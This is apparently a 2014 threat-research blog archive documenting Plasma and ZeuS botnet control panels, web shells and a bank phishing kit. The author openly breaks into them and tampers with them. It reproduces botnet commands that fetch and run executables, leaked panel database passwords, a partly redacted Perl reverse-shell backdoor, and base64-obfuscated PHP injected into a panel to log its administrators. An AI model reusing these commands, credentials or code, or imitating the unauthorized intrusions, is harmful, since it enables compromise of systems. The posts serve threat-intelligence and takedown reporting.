Thursday, January 30, 2014

PlasmaHTTP botnet on djurres.nl

PlasmaHTTP botnet and other junk on djurres.nl.

Plasma bot is a Windows based malware using HTTP to communicate with Command & Control server. Its primary functions are stealing credentials and DDoS. Not very sophisticated, but it gets the job done for many skids.  

djurres.nl
185.28.23.63 - Hosting24 Servers, US
abuse@main-hosting.com

C&C:
hxxp://www.djurres.nl/plasma/cp.php?a=online

Login:



Main page:
~450 bots






Running commands:
bot.update http://djurres.nl/plasma/1-29-14.exe java-update.exe [X] 
miner.start http://djurres.nl/plasma/miner/CPUMiner.files *-a scrypt -o stratum+tcp://eu.multipool.us:7777 -O Djurres.2:x -t 4* [X] 
miner.gpu.start http://djurres.nl/plasma/miner/GPUMiner.files *-a scrypt -o stratum+tcp://eu.multipool.us:7777 -u Djurres.1 -p x -g yes* [X] 
wait [X]

Real Fact: Mining for Bitcoin has huge profit margins.
CPU and GPU ?!?! Woah bro. 1337.

DDoS? uber cool! 


Stats:


Password log:


Ok, now this is the pathetic part.
I almost felt bad taking this botnet down.

Yes, that is a directory called "A Hackers Folder"


His pet RAT collection:


And a library of eBooks on how to 'spread' his shitty public copy of Plasma bot. 


I thought I pulled a sample that the update script was running, but I guess not.

bot.update http://djurres.nl/plasma/1-29-14.exe java-update.exe [X] 

Its too late now anyway.





Xzibit says:
actually, you have some eBooks to read ... so sad.




saccity.org hosting ZeuS 2.1.0.1 (2x botnets)

C&C listed on ZeuS Tracker.

saccity.org
198.58.93.56

hxxp://198.58.93.56/~saccity/.chmod/cp.php?m=login
(117 bots) - Most from India

Summary:

OS Stats:



hzzp://198.58.93.56/~saccity/.bin/cp.php
(50 bots) 2.1.0.1 - Most from India


C999shell and Bitcoin miner ELF:
saccity.org/aaa.php
saccity.org/minerd


C999 Shell
Awesome c99 mod bro...


WSO 2.5 Shell

lastlogin: 
195.5.208.250


Sorry, playtime is over for you. 


Pretty standard, nothing too interesting.

Thursday, January 16, 2014

Zeus 2.9.6.1

New ZeuS build 2.9.6.1 has leaked and is starting to be seen in the field.

Same abilities as earlier versions but new "Modules Parser" (iBank)
This new feature scans bot host machines for banking related processes and banking client applications. It hooks these processes and attempts to steal credentials.

Panel found via ZeuS Tracker
hxxp://89.248.161.244/fuck/xren.php?m=home
89.248.161.244
ECATEL, Netherlands

Summary:

Modules parser:

Script running:

script:
user_execute http://eyecatchersoptique.com/images/.stnfrn/server/a.exe

a.exe
VT: (21/46)
https://malwr.com/analysis/YjdiNThhZjc3MThmNGZmYmE3NmMwYThlNzZhMzdjYmY/


List of users:

NameStatusComment
adminEnabledDefault user
r00t78Enabled-


Related:

This botnet is run by the same guys seen here:

and here:


This server is now offline.

:-)

Monday, January 13, 2014

construtorassm.com.br - shells and DoS and phishing, oh my

construtorassm.com.br
177.87.155.43

Started with a WSO shell. Cracked into it.

Find all sorts of hideous junk on here, including a Credit Agricole (French Bank) phishing kit.
WSO shell
ICH Th3 Unkn0wn MySQL interface
Priv8 shell
Symlink Sa 2 panel
Dangerous Mailer
VNShell DDoS shell
K2LL33d shell
turkblackhats.com shell
1923Turk.com mod b374k shell,
RootDaBitch tool - brute force local accounts using su
CA.zip - Credit Agricole kit


Ok, lets have a look.

WSO 
(this was something like the 3rd WSO I found in here...seriously??)



MySQL Interface mod



Priv8 Shell
It literally tells me the password to the shell is 'priv8'

..and the password works. What an ugly piece of garbage too!



Symlink Panel
Symlink shared hosting directories to one place and mass deface.

Domains list, but symlinks arent working. Sorry buddy.
This thing stopped being useful a while ago.


Dangerous Mailer
Login to mailer panel.

Long view of Dangerous Mailer


VNShell Flooder
(because DoS is hacking)
This is the type of stuff they teach you at HackForums.
Oh yeah, and this isn't even a shell even though its called a shell.

Select the attack type

Target, http file, attack time



K2LL33d
Does it look like b374k shell (below)? 
Yes, thats because this skilled hacker just changed a few lines of code and called it his own work. 
v3ry sw33t


If your eyes aren't already bleeding, get a load of this.


TurkBlackhats Shell


b374k shell (1923Turk)
Yawn.


RootDaBitch
This tool brute forces su to gain elevated privileges, uses suCrack.

Directory listing of the kit, showing Bash script, password txt and screenshots?
Why?



Oh yes, because I don't know how to run a bash script, nor would there be useful info in the script source code either...sigh.

Not one, but two screenshots!
This one proves that he got in !! Wow cool. Fuck you.
Thanks "The Breacher" that was really helpful to me and my fellow skids. 


(Shake my head)

More things that are not that interesting and pretty useless but someone decided to spend time working on anyway:


PHP mailer, no panel, post method
<?php
/*Variaveis do Formulario*/
$nome = trim(@$_POST['nome']);/*recebe os dados digitados no campo "nome"*/
$email = trim(@$_POST['email']);/*recebe os dados digitados no campo "email"*/
$assunto_user = trim(@$_POST['assunto']);/*recebe os dados digitados no campo "assunto"*/
$mensagem = trim(@$_POST['mensagem']);/*recebe os dados digitados no campo "mensagem"*/
[...redacted]

Perl back connect
#!/usr/bin/perl      use Socket;      print "Data Cha0s Connect Back Backdoor\n\n";      if (!$ARGV[0]) {        printf "Usage: $0 [Host] <Port>\n";        exit(1);      }      print "[*] Dumping Arguments\n";      $host = $ARGV[0];      $port = 80;      if ($ARGV[1]) {        $port = $ARGV[1];      }      print "[*] Connecting...\n";      $proto = getprotobyname('tcp') || die("Unknown Protocol\n");      [...redacted]        die("Unable to Connect\n");      }      print "[*] Spawning Shell\n";      if (!fork( )) {        [...redatcted]        exec {'/bin/sh'} '-bash' . "\0" x 4;        exit(0);      }      print "[*] Datached\n\n";



Last but not least.

Credit Agricole phishing kit - CA.zip
Includes js, php, images, etc. for phishing site.
Bad guys redirect victim traffic to a kit like this in an effort to steal login credentials.
Crédit Agricole S.A. is the largest retail banking group in France, second largest in Europe and the eighth largest in the world by Tier 1 capital according to The Banker magazine. -Wikipedia.com 
Phishing pages:







I deleted all of this junk. All the shells, phishing pages, mailers, DoS 'shell'.. all of it.  I emailed the admins too. operacional[at]rapidoacesso.com.br


Sunday, January 12, 2014

ZeuS 2.1.0.1 - inlandbeardeddragons.com

Found C&C via ZeuS Tracker.

Panel was at:
hxxp://inlandbeardeddragons.com/templates/beez/.ama/cp.php?m=login

46 bots
config
$config['mysql_host'] = 'localhost';
$config['mysql_user'] = 'inlandbe_ama';
$config['mysql_pass'] = '1qaz2wsx';
$config['mysql_db'] = 'inlandbe_ama';

Running script:
user_execute http://eyecatchersoptique.com/images/.stnfrn/server/a.exe

Admin was moving bots to ZeuS 2.9.6.1

This is from the same admins researched here.

a.exe
https://www.virustotal.com/en/file/cac8ede4d09c2728f12421b6648da204e5a84561ebf3d9012fe39e0aa83a56fb/analysis/1389472180/

https://malwr.com/analysis/YjdiNThhZjc3MThmNGZmYmE3NmMwYThlNzZhMzdjYmY/

eyecatchersoptique.com - ZeuS 2.1.0.1

ZeuS 2.1.0.1 Botnet hosted on:
eyecatchersoptique.com
69.10.139.148
Linux server.ccommunity.com 2.6.18-194.26.1.el5

network:IP-Network-Block:69.10.139.144 - 69.10.139.151
network:Organization;I:ORG-CCommunitycom
network:Tech-Contact;I:noc@rackforce.com


panel:
hxxp://eyecatchersoptique.com/webstats/_stn/cp.php?m=login
Summary:
(144 bots)


Bots:
 OS Statistics


 TLD index is broken Wordpress





config.php

(144 bots)
$config['mysql_host']          = 'localhost';
$config['mysql_user']          = 'stn';
$config['mysql_pass']          = '1qaz2wsx';
$config['mysql_db']            = 'stn';


(0 bots)
public_html/images/.stnfrn/
#2
$config['mysql_host']          = 'localhost';
$config['mysql_user']          = 'stnfrn';
$config['mysql_pass']          = '1qaz2wsx';
$config['mysql_db']            = 'stnfrn';

Script:
user_execute hxxp://eyecatchersoptique.com/webstats/_stn/server/a.exe

Moving to ZeuS 2.9.6.1

a.exe
https://www.virustotal.com/en/file/cac8ede4d09c2728f12421b6648da204e5a84561ebf3d9012fe39e0aa83a56fb/analysis/1389472180/

https://malwr.com/analysis/YjdiNThhZjc3MThmNGZmYmE3NmMwYThlNzZhMzdjYmY/


Saturday, January 11, 2014

Patching ZeuS cp.php to track botnet administrators

This "patch" is straightforward. Not the most pretty method but it works for this job.

cp.php is the main control panel page used to administrate a ZeuS botnet. Every time you want to check files for stolen credentials or send commands to the botnet. you would be using cp.php

This being the only php file used for access and administration, will be the best file to patch for tracking.

Looked around on Google because I'm lazy and dont need to reinvent the wheel. I find this: (modified a bit) 

$file = 'sysfile.dat';$ipadress = $_SERVER['REMOTE_ADDR'];$date = date('d/F/Y h:i:s');$webpage = $_SERVER['SCRIPT_NAME'];$url = $_SERVER['REQUEST_URI'];$browser = $_SERVER['HTTP_USER_AGENT'];$fp = fopen($file, 'a');fwrite($fp, $ipadress.' - ['.$date.'] '.$url.' '.$webpage.' '.$browser."\r\n");fclose($fp);

Encode in Base64 to be "stealthy"


eval(base64_decode('JGZpbGUgPSAnc3lzZmlsZS5kYXQnOwokaXBhZHJlc3MgPSAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTsKJGRhdGUgPSBkYXRlKCdkL0YvWSBoOmk6cycpOwokd2VicGFnZSA9ICRfU0VSVkVSWydTQ1JJUFRfTkFNRSddOwokdXJsID0gJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ107CiRicm93c2VyID0gJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOwokZnAgPSBmb3BlbigkZmlsZSwgJ2EnKTsKZndyaXRlKCRmcCwgJGlwYWRyZXNzLicgLSBbJy4kZGF0ZS4nXSAnLiR1cmwuJyAnLiR3ZWJwYWdlLicgJy4kYnJvd3Nlci4iXHJcbiIpOwpmY2xvc2UoJGZwKTs='));


Insert this code in cp.php, save, and its now patched and ready to log activity!

Here is an example log for a ZeuS botnet that I was tracking.


ZeuS C&C via Google Dorks and tracking ZeuS Admins - biterelish.co.za

Over the weekend I found some ZeuS C&Cs using Google.

Most command and control servers found using dorks are offline now, but not all. This one was still active and getting larger.

I had an idea to "patch" cp.php so that I could track the guys who admin this.


ZeuS C&C

biterelish.co.za
207.45.186.26
Uname: Linux serve16.serve-hosting.net 2.6.18-448.16.1.el5.lve0.8.70PAE

CIDR:           207.45.176.0/20
OriginAS:       AS36444, AS2828
NetName:        ACENETMI

3x ZeuS botnets hosted:


Summary:
(357 bots)
OS Statistics:
Search for Files:



Summary page from last week, showing 331 bots.



Options & Encryption Key:
Monkey@Bannana123!!!

named botnets: vti, will, txt


hxxp://biterelish.co.za/txt/cp.php?m=home (RU language set on Panel)
32 bots, Active since Aug 2013 (txt)
$config['mysql_host'] = 'localhost';
$config['mysql_user'] = 'bitereli_biterel';
$config['mysql_pass'] = 'h7Uu6wpW9A%s';
$config['mysql_db'] = 'bitereli_bitereli



hxxp://biterelish.co.za/will/cp.php?m=home
10 bots (will)
$config['mysql_host'] = 'localhost';
$config['mysql_user'] = 'bitereli_bits';
$config['mysql_pass'] = 'Go;vEI-;le94';
$config['mysql_db'] = 'bitereli_biterel';


hxxp://biterelish.co.za/vti/cp.php?m=login
350+ bots (vti)
$config['mysql_host'] = 'localhost';
$config['mysql_user'] = 'bitereli_admin';
$config['mysql_pass'] = '@ph;yiTpFg}?';
$config['mysql_db'] = 'bitereli_admin';


A shell was here:
hxxp://biterelish.co.za/images/temp.php#




Used the shell to patch cp.php as discussed in this post. 

Here is the access log for this ZeuS botnet.


Admin IP and ISP:
93.186.23.83 - Blackberry UK RIM
93.186.23.115 - Blackberry UK RIM
93.186.31.113 - Blackberry UK RIM
196.46.245.50 - AirTel Nigeria
196.46.245.49 - AirTel Nigeria
196.46.245.48 - AirTel Nigeria
41.203.69.2 - Globacom Nigeria
41.203.69.5 - Globacom Nigeria
41.203.69.6 - Globacom Nigeria

We can clearly see who was working on this botnet. We have access from two wireless provider networks in Nigeria, user agent showed Win7 using Firefox, and a Blackberry from the UK.

Law enforcement should be able to use these access logs as evidence against the admins.. or at least give a clue as to who is behind this.

Friday, January 10, 2014

ZeuS hosted on masabe7.com

ZeuS 2.1.0.1 C&C hosted on:
masabe7.com
205.251.135.234
network:ID:8.205.251.128.0/19
network:Auth-Area:205.251.128.0/19
network:Network-Name:WHB-COLO-5
network:IP-Network:205.251.135.0/24
network:Organization;I:WEBHOSTINGBUZZ.COM
network:Tech-Contact;I:engineering@gnax.net

519 bots (315 from India)

hxxp://masabe7.com/powede/cp.php?m=login


Summary:


 OS Statistics:



Now its 403 Forbidden
Good stuff.